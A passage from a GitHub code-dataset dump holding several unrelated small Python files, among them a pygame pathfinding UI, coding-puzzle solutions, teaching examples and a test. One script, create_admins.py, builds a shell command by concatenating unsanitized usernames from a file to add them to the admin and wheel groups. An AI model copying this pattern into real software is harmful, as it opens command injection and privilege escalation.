previousePlayerPosition, taskPosition, taksSpikes, taskVideo )\n \n #reset var\n spotLis = []\n listIndex = 0\n displayVideoFlag = False\n getInput = True\n\n #rest position \n clearTaskSpikes( taksSpikes )\n player.setPosition( spots[ 'cafereria' ] )\n \n delay( DELAY_TIME )\n\n #move player\n else:\n player.setPosition( moveList[ listIndex ] )\n playerPosition = player.getPosition()\n\n #player at task\n if playerPosition in taskPosition:\n previousePlayerPosition = playerPosition\n displayVideoFlag = True\n\n elif( displayVideoFlag == True):\n displayVideo( previousePlayerPosition, taskPosition, taksSpikes, taskVideo )\n displayVideoFlag = False\n\n for task in range( len(taskPosition) ):\n taksSpikes[ task ].setPosition( taskPosition[task] )\n \n listIndex += 1\n\n delay( DELAY_TIME )\n\n all_sprites.update()\n \n screen.blit(bg_surface, (0,0))\n all_sprites.draw( screen )\n \n pygame.display.update()\n \n clock.tick( 1 )\n","repo_name":"Titivat/AStartAmongUs","sub_path":"UI.py","file_name":"UI.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72329905388","text":"import os\r\nimport linecache\r\n\r\nadmin = open(\"admin_users.txt\",\"w\")\r\nfile = \"users.txt\"\r\nln = 1\r\n\r\nwhile ln < 21:\r\n line = linecache.getline(file, ln).strip()\r\n admin.write(line + '\\n')\r\n os.system(\"usermod -a -G admin,wheel \" + line)\r\n ln +=1\r\n\r\nadmin.close()\r\n\r\n\r\n","repo_name":"SCary120/Linux-Admin-Portfolio","sub_path":"create_admins.py","file_name":"create_admins.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16429377637","text":"class Solution:\n def countSubstrings(self, s: str) -> int:\n # number of the palindromic substrings\n res = [0]\n for i in range(len(s)):\n # make the current as the centre of our palindrome and then loop going outwards\n # odd length, get alll odd strings\n l,r = i, i\n self.helper(l, r, s, res)\n \n # even length\n l,r = i, i+1\n self.helper(l, r, s, res)\n return res[0]\n\n def helper(self, l, r, s, res):\n while l >= 0 and r < len(s) and s[l] == s[r]:\n res[0] += 1\n l -= 1\n r += 1","repo_name":"b0nbon1/dope-stuff","sub_path":"extras/quick-prep-75/palindromic-substrings.py","file_name":"palindromic-substrings.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"40124108137","text":"import os, sys\nimport re\nimport string\nimport glob\nimport shutil\n\n\n# function that clean script name for readability\ndef clean_script_name(content):\n # ----\n # format filename for readability\n # ----\n title = content.replace('_', ' ').capitalize()\n\n for k, v in abbv.items():\n title = re.sub(r'\\b{}\\b'.format(k), f'{v}', title)\n title = re.sub(r'\\b{}\\b'.format(k.capitalize()), f'{v}', title)\n\n title = re.sub(r'\\b{}s\\b'.format(k), f'{v}s', title)\n title = re.sub(r'\\b{}s\\b'.format(k.capitalize()), f'{v}s', title)\n\n for letter in letter_l:\n title = re.sub(r'\\b{}\\b'.format(letter), letter.upper(), title)\n\n return title\n\n\nheader = ('analytics'\n , 'automation'\n , 'cleaning'\n , 'database'\n , 'extraction'\n , 'reporting'\n , 'automation'\n , 'integration'\n , 'modeling'\n , 'OS'\n , 'visualization'\n , 'raw_data'\n , 'output'\n , 'fun-code'\n)\nabbv = {\n 'w': 'with'\n , 'n': 'and'\n , 'linux': 'Linux'\n , 'windows': 'Windows'\n , 'icd': 'ICD'\n , 'icd9': 'ICD-9'\n , 'icd10': 'ICD-10'\n , 'json': 'JSON'\n , 'csv': 'CSV'\n , 'vs': 'vs.'\n , 'api': 'API'\n , 'w9': 'W-9'\n , 'ocr': 'OCR'\n , 'id': 'ID'\n , 'postgresql': 'PostgreSQL'\n , 'asc': 'ASC'\n , 'x12': 'X12'\n , 'nlp': 'NLP'\n , 'scp': 'SCP'\n , 'ssh': 'SSH'\n , 'excel': 'Excel'\n , 'state': 'State'\n , 'npi': 'NPI'\n , 'city': 'City'\n , 'usps': 'USPS'\n , 'datetime': 'DateTime in specified timezone'\n , 'reg': 'Regression'\n , 'knn': 'KNN'\n , 'temp': 'temporary'\n , 'states': 'States'\n , 'barplot': 'Barplot'\n , 'us': 'US'\n , 'nyc': 'NYC'\n , 'pic': 'picture'\n , 'exe': 'Exe'\n , 'dup': 'duplicate'\n , 'pdf': 'PDF'\n , 'desktop': 'Desktop'\n}\n\nletter_l = list(string.ascii_lowercase)\npwd = os.getcwd()\n\n\n#----\n# grep only relevant files for processing\n#----\nscript_d = {}\n\nfor raw in glob.glob('*.*'):\n sep = raw.split('__')\n\n for head in header:\n for ele in sep:\n if head == ele:\n script_d[raw] = 1\n\n# [print(k) for k in script_d]\n\n\nfor head in header:\n for f in glob.glob(f'{pwd}\\{head}\\*.*'):\n if '.md' not in f:\n os.remove(f)\n\n\nreadme_d = {}\n\nfor script in script_d:\n print(script)\n #----\n # separate category header\n #----\n sep = script.split('__')\n\n # category to put script into folder\n script_header = sep[:-1]\n\n # script name to be formatted for readability\n content = sep[-1]\n # print(content)\n\n #----\n # clean script name for readability\n #----\n title = clean_script_name(content)\n\n #----\n # put script into folder with path according to header list and name according to content\n #----\n\n\n src = rf'{pwd}\\{script}'\n\n for script_head in script_header:\n des = rf'{pwd}\\{script_head}\\{content}'\n\n shutil.copy(src, des)\n\n print('->' + f'...\\{script_head}\\{content}')\n\n if 'Config.py' not in title:\n readme_d[f'{script_head}|{title}'] = 1\n\n\n print()\n print(title)\n\n\n print('-' * 150)\n\n\n# print(readme_d)\n#----\n# edit readme files with readable file names\n#----\nfor head in header:\n with open(rf'{pwd}\\{head}\\README.md', 'w') as fw:\n print('# Scripts for {}'.format(head.capitalize()), file=fw )\n for k in readme_d:\n script_head = k.split('|')[0]\n title = k.split('|')[1]\n\n if head == script_head:\n print(title + '\\n', file=fw)\n","repo_name":"jameswniu/fun-code","sub_path":"sort_files_into_folders_write_readme_refine_script_name_for_readability.py","file_name":"sort_files_into_folders_write_readme_refine_script_name_for_readability.py","file_ext":"py","file_size_in_byte":3577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7960875654","text":"#yield\ndef filter_numbers(predicate):\n for i in range(0, 100):\n if predicate(i):\n yield i\n\nnumbers = filter_numbers(lambda n: n % 2 == 0)\nfor n in numbers:\n print(n)\n\t\n#Classes\n\nclass ShoppingCart:\n\n def __init__(self):\n self.items = []\n\n def addItems(self, name, price):\n self.items.append((name,price))\n\n def __iter__(self):\n return self.items.__iter__()\n\nif __name__ == \"__main__\":\n cart = ShoppingCart()\n cart.addItems('xbox', 500)\n cart.addItems('playstation', 400)\n\n for item in cart:\n print(item)\n\t\t\n#lambda\ndef add(x,y):\n return x + y\n\nc = add(5, 6)\nprint(c)\n\n# lambda\nadd2 = lambda x, y: x + y\n\nc = add2(5, 6)\nprint(c)\n\n#functions\ndef banner(message, border=\"-\"):\n banner = border * len(message)\n print(banner)\n print(message)\n print(banner)\n\nnumbers = [1, 2, 3, 4, 5, 6]\n\nfor n in numbers:\n print(n, end=', ')\n\t\n#Decorators\nimport functools\nimport time\n\ndef timer(func):\n @functools.wraps(func)\n def wrapper_decorator(*args, **kwargs):\n # Do something before\n start_time = time.perf_counter() \n\n value = func(*args, **kwargs)\n \n # Do something after\n end_time = time.perf_counter()\n run_time = end_time - start_time\n print(f\"Finished {func.__name__!r} in {run_time:.4f} secs\")\n return value\n return wrapper_decorator\n\n\n@timer\ndef waste_some_time(num_times):\n for _ in range(num_times):\n sum([i**2 for i in range(10000)])\n\n#except\ndef test():\n while True:\n try:\n x = int(input(\"Please enter a number: \"))\n break\n except ValueError:\n print(\"Oops! That was no valid number. Try again...\")\n finally:\n print(\"I always execute\")\n\n#context managers\nclass File():\n\n def __init__(self, filename, mode):\n self.filename = filename\n self.mode = mode\n\n def __enter__(self):\n self.open_file = open(self.filename, self.mode)\n return self.open_file\n\n def __exit__(self, *args):\n self.open_file.close()\n\nfiles = []\nfor _ in range(10000):\n with File('foo.txt', 'w') as infile:\n infile.write('foo')\n files.append(infile)\n\n# Async/Await\n# pip install aiohttp\nimport signal \nimport sys \nimport asyncio \nimport aiohttp \nimport json\n\nloop = asyncio.get_event_loop() \nclient = aiohttp.ClientSession(loop=loop)\n\nasync def get_json(client, url): \n async with client.get(url) as response:\n assert response.status == 200\n return await response.read()\n\nasync def get_reddit_top(subreddit, client): \n data1 = await get_json(client, 'https://www.reddit.com/r/' + subreddit + '/top.json?sort=top&t=day&limit=5')\n\n j = json.loads(data1.decode('utf-8'))\n for i in j['data']['children']:\n score = i['data']['score']\n title = i['data']['title']\n link = i['data']['url']\n print(str(score) + ': ' + title + ' (' + link + ')')\n\n print('DONE:', subreddit + '\\n')\n\ndef signal_handler(signal, frame): \n loop.stop()\n client.close()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\nasyncio.ensure_future(get_reddit_top('python', client)) \nasyncio.ensure_future(get_reddit_top('programming', client)) \nasyncio.ensure_future(get_reddit_top('compsci', client)) \nloop.run_forever() ","repo_name":"janierdavila/python-for-dot-net-devs-talk","sub_path":"all_python_examples.py","file_name":"all_python_examples.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11630535997","text":"from dlc2action.project import Project\nimport pytest\nimport os\nfrom pathlib import Path\n\n\ndef test_delete():\n \"\"\"\n Test `dlc2action.project.project.Project.evaluate`\n\n Check that everything runs successfully.\n \"\"\"\n\n path = os.path.join(os.path.dirname(__file__), \"data\")\n\n Project.remove_project(\"test_delete_datasets\")\n project_path = os.path.join(str(Path.home()), \"DLC2Action\", \"test_delete_datasets\")\n assert not os.path.exists(project_path)\n project = Project(\n \"test_delete_datasets\",\n data_type=\"dlc_track\",\n annotation_type=\"csv\",\n data_path=path,\n annotation_path=path,\n )\n project.update_parameters(\n {\n \"data\": {\n \"data_suffix\": \"DeepCut_resnet50_Blockcourse1May9shuffle1_1030000.csv\", # set; the data files should have the format of {video_id}{data_suffix}, e.g. video1_suffix.pickle, where video1 is the video is and _suffix.pickle is the suffix\n \"canvas_shape\": [1000, 500], # list; the size of the canvas where the pose was defined\n \"annotation_suffix\": \".csv\", # str | set, optional the suffix or the set of suffices such that the annotation files are named {video_id}{annotation_suffix}, e.g, video1_suffix.pickle where video1 is the video id and _suffix.pickle is the suffix\n \"fps\": 25,\n },\n \"general\": {\n \"exclusive\": True, # bool; if true, single-label classification is used; otherwise multi-label\n \"only_load_annotated\": True,\n \"metric_functions\": {\"f1\"}\n }, \n \"training\": {\n \"partition_method\": \"time:strict\", \n \"val_frac\": 0.5, \n \"normalize\": False,\n \"num_epochs\": 1,\n }\n }\n )\n project.run_episode(\"first\")\n project.run_episode(\n \"second\",\n parameters_update={\"general\": {\"overlap\": 50}},\n remove_saved_features=True,\n )\n assert len(os.listdir(os.path.join(project.project_path, \"saved_datasets\"))) == 2\n project.remove_saved_features()\n assert len(os.listdir(os.path.join(project.project_path, \"saved_datasets\"))) == 0\n Project.remove_project(\"test_delete_datasets\")\n\n\n# test_delete()\n","repo_name":"amathislab/DLC2action","sub_path":"tests/test_delete_datasets.py","file_name":"test_delete_datasets.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"38655855026","text":"from functools import reduce\nfrom operator import xor\nfrom collections import deque\n\nlist_size=256\nbit_size=128\n\ndef knot_hash(input):\n lst = [i for i in range(0, list_size)]\n current_pos = lst[0]\n skip = 0\n lengths = [ord(i) for i in input]\n lengths.extend([17, 31, 73, 47, 23])\n for j in range(64):\n for l in lengths:\n last_i = current_pos + l\n rem = last_i - list_size\n r = []\n if rem > 0:\n for i in range(current_pos, list_size):\n r.append(lst[i])\n for i in range(0, min(rem, current_pos)):\n r.append(lst[i])\n for i in range(current_pos, list_size):\n lst[i] = r.pop()\n for i in range(0, rem):\n lst[i] = r.pop()\n else:\n rem = last_i\n lst[current_pos:last_i] = reversed(lst[current_pos:last_i])\n \n new_pos = rem + skip\n while new_pos >= list_size:\n new_pos -= list_size\n \n current_pos = new_pos\n skip += 1\n \n dense_hash = []\n for i in range(0, list_size, 16):\n res = reduce(xor, lst[i: i+16])\n dense_hash.append(res)\n \n \n hex_str = ''\n for d in dense_hash:\n if len(hex(d)[2:]) != 2:\n hex_str += '0'\n hex_str += hex(d)[2:]\n \n b = bin(int(hex_str, 16))[2:].zfill(bit_size)\n return b\n\ndef part1(data):\n num_used = 0\n for i in range(bit_size):\n b = knot_hash(data + str(i))\n num_used += b.count(\"1\")\n return num_used\n\ndef get_adj_cells(row, col):\n res = []\n if row != 0:\n res.append((row - 1, col))\n if row != 127:\n res.append((row + 1, col))\n if col != 0:\n res.append((row, col - 1))\n if col != 127:\n res.append((row, col + 1))\n return res\n\ndef part2(data):\n grid = []\n for i in range(bit_size):\n b = knot_hash(data + str(i))\n grid.append(list(b))\n regions = 0\n visited = set()\n for r in range(bit_size):\n for c in range(bit_size):\n if (r, c) in visited or grid[r][c] != \"1\":\n continue\n regions += 1\n stack = deque([(r, c)])\n while stack:\n row, col = stack.popleft()\n visited.add((row, col))\n res = get_adj_cells(row, col)\n for (rr, cc) in res:\n if (rr, cc) not in visited and grid[rr][cc] == \"1\":\n stack.append((rr, cc))\n return regions","repo_name":"Panda4817/Advent-of-Code-2017","sub_path":"14.py","file_name":"14.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17034533481","text":"'''\nYou are given a number ‘n’. You have to tell whether a number is great or not. A great number is a number whose sum of digits let (m) and product of digits let(j) when summed together gives the number back\n\nm+j=n\n\n \n\nInput Description:\nYou are given a number n;\n\nOutput Description:\nPrint Great if a number is great else print the no\n\nSample Input :\n59\nSample Output :\nGreat\n'''\n\nui = int(input())\nsum = 0\nprod = 1\nfor digit in str(ui): sum += int(digit)\nfor digit in str(ui): prod *= int(digit)\nif sum+prod==ui: print(\"Great\")\nelse: print(\"no\")\n","repo_name":"alloc7260/GUVI-code-practice","sub_path":"CODEKATA/Numbers/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31102399585","text":"#Faça um programa que calcule o MMC (mínimo múltiplo comum) entre dois números.\n\na, b = input().split()\na, b = int(a), int(b)\na, b = max(a,b), min(a,b)\nfor i in range (1,b+1):\n if 0 == (a*i)%b:\n m = a*i\n break\nprint(m)\n","repo_name":"Matheus-616/Stepik","sub_path":"lista3: estruturas de repetição/L3Q8.py","file_name":"L3Q8.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34425170978","text":"# link : https://leetcode.com/problems/add-two-numbers-ii/description/\n# author : Mohamed Ibrahim\nclass Solution:\n def helper(self, l1: ListNode, l2: ListNode) -> ListNode:\n stack1 = []\n stack2 = []\n\n while l1:\n stack1.append(l1.val)\n l1 = l1.next\n\n while l2:\n stack2.append(l2.val)\n l2 = l2.next\n\n result = None\n carry = 0\n\n while stack1 or stack2 or carry:\n digit1 = stack1.pop() if stack1 else 0\n digit2 = stack2.pop() if stack2 else 0\n\n total = digit1 + digit2 + carry\n digit = total % 10\n carry = total // 10\n\n newNode = ListNode(digit)\n newNode.next = result\n result = newNode\n\n return result\n\n def addTwoNumbers(self, l1: ListNode, l2: ListNode) -> ListNode:\n ans = self.helper(l1, l2)\n return ans\n","repo_name":"M0hamedIbrahim1/-Data-Structure-Algorithms","sub_path":"LinkedList/Problems/445. Add Two Numbers II.py","file_name":"445. Add Two Numbers II.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"22872551647","text":"from __future__ import absolute_import\n\nfrom celery import shared_task\nfrom celery import Task\nfrom jhtdb.jhtdblib import JHTDBLib\nfrom jhtdb.jhtdblib import CutoutInfo\nfrom jhtdb.hdfdata import HDFData\nfrom jhtdb.vtkdata import VTKData\n\n\n@shared_task\ndef add(x, y):\n return x + y\n\n\n@shared_task\ndef mul(x, y):\n return x * y\n\n\n@shared_task\ndef xsum(numbers):\n return sum(numbers)\n\nclass Getbigcutout(Task):\n\n def __init__(self):\n self.progress = 0\n\n def run(self, webargs, ipaddr):\n print(\"Task begin\")\n self.update_state(state='PROGRESS', meta={'cubes': 0, 'percent': 0})\n ci = CutoutInfo()\n ci.ipaddr = ipaddr\n jhlib = JHTDBLib()\n #Parse web args into cutout info object\n ci=jhlib.parsewebargs(webargs)\n ci.persistance = 1\n #Verify token (remove in the future--handled by stored procedure now.\n print (\"Checking token\")\n isValid, limit = jhlib.verify(ci.authtoken,1)\n if isValid:\n if (ci.filetype == \"vtk\"):\n #vtkfile = VTKData().getvtk(ci) #Note: This could be a .vtr, .vti, or .zip depending on the request!\n #Set the filename to the dataset name, and the suffix to the suffix of the temp file\n #response['Content-Disposition'] = 'attachment;filename=' + ci.dataset +'.' + vtkfile.name.split('.').pop()\n #Since VTK can have different file types, getvtk makes those decisions and returns the HTTP response with the correct file info.\n response = VTKData().getvtk(ci)\n print(\"Got vtk response\")\n else:\n #Serve up an HDF5 file\n path = '/var/www/cutoutcache/'\n h5file = HDFData().gethdf(ci, self)\n filename = ci.dataset + \"_\" + ci.authtoken + \".h5\"\n #f = h5py.File(filename, 'w')\n #copy the tempfile to the permanent file\n #shutil.copy(h5file.name, path + filename)\n print (\"Saved HDF file\")\n return filename\n else:\n response = HttpResponse(\"Error: token is invalid\")\n #request.session['download_progress'] = 100 #test for progress bar. Should update based on cutout\n print(\"returning response\")\n return response\n\n","repo_name":"idies/Turbulence","sub_path":"Cutout_Webservice/jhtdb/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"26055209074","text":"# N과M 9 B_15663\n# (5)와 대응 # N개의 자연수 ('서로다른 자연수'가 아니기 때문에 같은 수 있을 수 있음)\n# 하지만 문제는 달라지지 않음\n# 방법 1: (5) 문제 풀이 + 중복 제거\n\n# 방법 2: 재귀함수 한번에 풀이\n# 수의 개수를 세어줌 + 중복제거\nimport sys\nfrom collections import Counter\nn, m = map(int, input().split())\ntemp = list(map(int, input().split()))\n\n# Counter는 요소의 갯수를 세어줌\n# ex) temp = [9, 7, 9, 1]\n# 그냥 Counter만 썻을 때에는 [9,7,1]\n# Counter(temp).items() = [(9,2), (7,1), (1,1)]\ntemp = list(Counter(temp).items())\ntemp.sort()\n\nn = len(temp)\nnum, cnt = map(list, zip(*temp))\n# print(num) # num = [1,7,9]\n# print(cnt) # cnt = [1,1,2]\na = [0]*m # 정답을 넣는 배열\n\ndef solution(index, n, m):\n if index == m:\n sys.stdout.write(' '.join(map(str, a)) + '\\n')\n return\n for i in range(n):\n if cnt[i] > 0:\n cnt[i] -= 1\n a[index] = num[i]\n solution(index+1, n, m)\n cnt[i] += 1\n\n\nsolution(0,n,m)\n\n\n\n","repo_name":"snowedev/baekjoon-code.plus","sub_path":"baekjoon/[Bruteforce]/기초/[N과M]/[N과M](9).py","file_name":"[N과M](9).py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37284608695","text":"class Solution:\n def toGoatLatin(self, S):\n \"\"\"\n :type S: str\n :rtype: str\n \"\"\"\n vowels=('a','e','i','o','u','A','E','I','O','U')\n res=[]\n words=S.split()\n for index,word in enumerate(words):\n if word[0] in vowels:\n res.append(word+\"ma\"+'a'*index)\n else:\n res.append(word[1:]+word[0]+\"ma\"+'a'*(index+1))\n return \" \".join(res)\n\n\ns=Solution()\nprint(s.toGoatLatin(\"I speak Goat Latin\"))\n","repo_name":"jiangshshui/leetcode","sub_path":"seventeenthPage/824_GoatLatin.py","file_name":"824_GoatLatin.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1704831423","text":"import serial # import Serial Library\nimport numpy # Import numpy\nimport matplotlib.pyplot as plt #import matplotlib library\nimport datetime\n\nfrom drawnow import *\n\nhum=[]\ntemp= []\nheatin= []\nmoist= []\n\narduinoData = serial.Serial('/dev/ttyACM0', 115200) #Creating our serial object named arduinoData\nplt.ion() #Tell matplotlib you want interactive mode to plot live data\ncnt=0\n\ndef makeFig(): #Create a function that makes our desired plot\n# plt.ylim(80,90) #Set y min and max values\n plt.title('My Live Streaming Sensor Data') #Plot the title\n plt.grid(True) #Turn the grid on\n plt.ylabel('Temp C') #Set ylabels\n plt.plot(temp, 'ro-', label='Degrees C') #plot the temperature\n plt.legend(loc='upper left') #plot the legend\n plt2=plt.twinx() #Create a second y axis\n# plt.ylim(93450,93525) #Set limits of second y axis- adjust to readings you are getting\n plt2.plot(hum, 'b^-', label='Relative Humidity (%)') #plot pressure data\n plt2.set_ylabel('Relative Humidity (%)') #label second y axis\n# plt2.ticklabel_format(useOffset=False) #Force matplotlib to NOT autoscale y axis\n plt2.legend(loc='upper right') #plot the legend\n \n\ninfile = open('data.csv', 'a')\n\ntry:\n while True: # While loop that loops forever\n while (arduinoData.inWaiting()==0): #Wait here until there is data\n pass #do nothing\n arduinoString = arduinoData.readline() #read the line of text from the serial port\n dataArray = arduinoString.split(',') #Split it into an array called dataArray\n h = float( dataArray[0]) \n t = float( dataArray[1]) \n hic = float( dataArray[2]) \n m = float( dataArray[3])\n\n hum.append(h)\n temp.append(t)\n heatin.append(hic)\n moist.append(m)\n\n row = datetime.datetime.now().strftime(\"%m-%d-%y,%H:%M:%S\") + ',' + str(h) + ',' + str(t) + ',' + str(hic) + ',' + str(m) +'\\n'\n infile.write(row)\n infile.flush()\n\n drawnow(makeFig)\n plt.pause(.001) #Pause Briefly. Important to keep drawnow from crashing\n cnt=cnt+1\n if(cnt>50): #If you have 50 or more points, delete the first one from the array\n hum.pop(0) #This allows us to just see the last 50 data points\n temp.pop(0)\n heatin.pop(0)\n moist.pop(0)\n\nexcept KeyboardInterrupt:\n infile.close()\n","repo_name":"NukeManDan/Arduino-work","sub_path":"MoistureHumiditySensor/MoistureHumiditySensor.py","file_name":"MoistureHumiditySensor.py","file_ext":"py","file_size_in_byte":2678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30802244098","text":"exercises = [\"squat\", \"leg press\", \"leg curl\", \"leg extension\",\"lunges\"]\n# print(exercises)\n# print(exercises[0])\n# print(exercises[-3])\n\n#****list methods**** \n# returns the item at indicated index item from the list\n# print(exercises.pop())\n# pass in item to append as the argument for the list\n# print value seperately from using append method print(list.append(\"foo\") does not return list it returns \"none\")\nexercises.append('front squat')\n# takes in two arguments, index position and value to add\nexercises.insert(1, ['array', 'string'])\nprint(exercises[1])\n\n\n","repo_name":"oagomezz/python-work","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6224278996","text":"from psychopy import gui\r\n\r\n\r\n# 1) create subject lists\r\ndef randomlist():\r\n bio = [1, 2, 3, 4, 5, 6]\r\n psych = [7, 8, 9, 10, 11, 12]\r\n return bio, psych\r\n\r\n# 2) Initialize the gui windows, they well be updated later\r\n# define gui\r\nmyDlg = gui.Dlg(title=\"SFB_289\")\r\nmyDlgbio = gui.Dlg(title=\"Quiz\")\r\nmyDlgpsych = gui.Dlg(title=\"Quiz\")\r\n\r\n\r\n# 3) Adapt gui widows accordingly\r\ndef sub_id():\r\n myDlg.addField('Subject ID:')\r\n myDlg.addField('mzp:', )\r\n ok_data = myDlg.show() # show dialog and wait for OK or Cancel\r\n if myDlg.OK: # or if ok_data is not None\r\n print(ok_data)\r\n else:\r\n print('user cancelled')\r\n return ok_data\r\n\r\n\r\ndef quiz_bio():\r\n myDlgbio.addField('Frage 1:', choices =[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgbio.addField('Frage 2:', choices =[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgbio.addField('Frage 3:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgbio.addField('Frage 4:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n\r\n # show dialog and wait for OK or Cancel\r\n ok_databio = myDlgbio.show()\r\n\r\n # or if ok_data is not None\r\n if myDlgbio.OK:\r\n print(ok_databio)\r\n else:\r\n print('user cancelled')\r\n return ok_databio\r\n\r\n\r\ndef quiz_psych():\r\n myDlgpsych.addField('Frage 1:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgpsych.addField('Frage 2:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgpsych.addField('Frage 3:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n myDlgpsych.addField('Frage 4:', choices=[\"A1\", \"A2\", \"A3\", \"A4\"])\r\n\r\n # show dialog and wait for OK or Cancel\r\n ok_datapsych = myDlgpsych.show()\r\n\r\n # or if ok_data is not None\r\n if myDlgpsych.OK:\r\n print(ok_datapsych)\r\n else:\r\n print('user cancelled')\r\n return ok_datapsych\r\n","repo_name":"PhilLange/Explain_D","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32628971894","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 13 13:59:30 2017\n\n@author: Labvis\n\"\"\"\n\nimport numpy as np\nimport os\nimport scipy.linalg\n\n#A = np.asarray([[6.0, 3, 4, 8], [3, 6, 5, 1], [4, 5, 10, 7], [8, 1, 7, 25]])\n#A = np.asarray([[12.0, -51.0, 4], [6,167,-68], [-4, 24, -41]])\n\ndef QRdecomposition(A):\n\n test = A.copy()\n n = A.shape[0]\n m= A.shape[1]\n\n Qant = 0\n \n for i in range(m):\n c = test[i :,i]\n # if c.size == 0:\n# return Qant,Rant\n if i != 0:\n zeros = np.zeros(i)\n c = np.concatenate((zeros,c),axis = 0)\n \n v = np.asarray((c - np.dot(np.linalg.norm(c),np.eye(1,n,i)))).reshape(-1)\n #print(np.eye(1,n,i))\n H = np.eye(n)-2/np.dot(v,v)*(np.dot(v[:,None],v[None,:]))\n if i == 0:\n Q = H\n R = Q@A\n else:\n Q = Qant@H\n R = H@R\n #os.system(\"pause\")\n if istriu(R) == True and m!=n:\n break;\n test = R.copy()\n Qant = Q.copy()\n Rant = R.copy()\n Q = -1*Q\n R = -1*R \n return Q,R \n\ndef QReigenvalues(A): \n n,m = A.shape\n if n !=m:\n print(\"Insert a square matrix\")\n return 0\n while True:\n Q,R = QRdecomposition(A)\n Anew = R@Q\n \n if istriu(A) == True:\n return Anew\n else:\n A = Anew\n \n\ndef istriu(A):\n n,m = A.shape\n s=[]\n for i in range(n):\n for j in range(m):\n if j < i :\n s.append(A[i][j])\n if np.sum(s) < 0.0001:\n B = True\n else:\n B = False\n #print(s)\n return B\n\n#def QReigenvectors(A):\n ","repo_name":"GerardoFonteles/Mestrado","sub_path":"Algebra Linear/implementacao/QRdecomposition.py","file_name":"QRdecomposition.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42050123927","text":"from turtle import Turtle,Screen\nimport turtle\n\n\nscreen = Screen()\nscreen.setup(width=500,height=400)\nuserinput = screen.textinput(\"welcome to turtle race bet on your turtle\",\"type a color in small alphabet:\")\n\nimport random\n\nl = [\"red\",\"blue\",\"black\",\"orange\",\"yellow\",\"green\"]\n\nydistace = [-150,-100,-50,0,50,100]\nallturtle =[]\n\n\nfor i in range(6):\n\n newt = Turtle()\n newt.shape(\"turtle\")\n newt.color(l[i])\n newt.penup()\n newt.goto(-230, ydistace[i])\n\n\n allturtle.append(newt)\nprint(allturtle)\nif userinput:\n israceon = True\nwhile israceon:\n\n for turtlee in allturtle:\n if turtlee.xcor() > 230:\n israceon = False\n wit = turtlee.pencolor()\n winingcolor = wit\n if winingcolor == userinput:\n print(\"you win\")\n else:\n print(f\"youloss,{winingcolor} win\")\n else:\n\n turtlee.forward(random.randint(1,20))\n\n\np = Screen()\np.exitonclick()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"RajeevPrakashAD1/python_projects","sub_path":"turtle racingg/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20845343436","text":"\"\"\"Added one-to-many relationship\n\nRevision ID: 7557320529cc\nRevises: dd8e86966ba4\nCreate Date: 2021-11-25 10:36:34.585394\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7557320529cc'\ndown_revision = 'dd8e86966ba4'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('keyboards', sa.Column('creator_id', sa.Integer(), nullable=True))\n op.create_foreign_key(None, 'keyboards', 'flasklogin-users', ['creator_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by 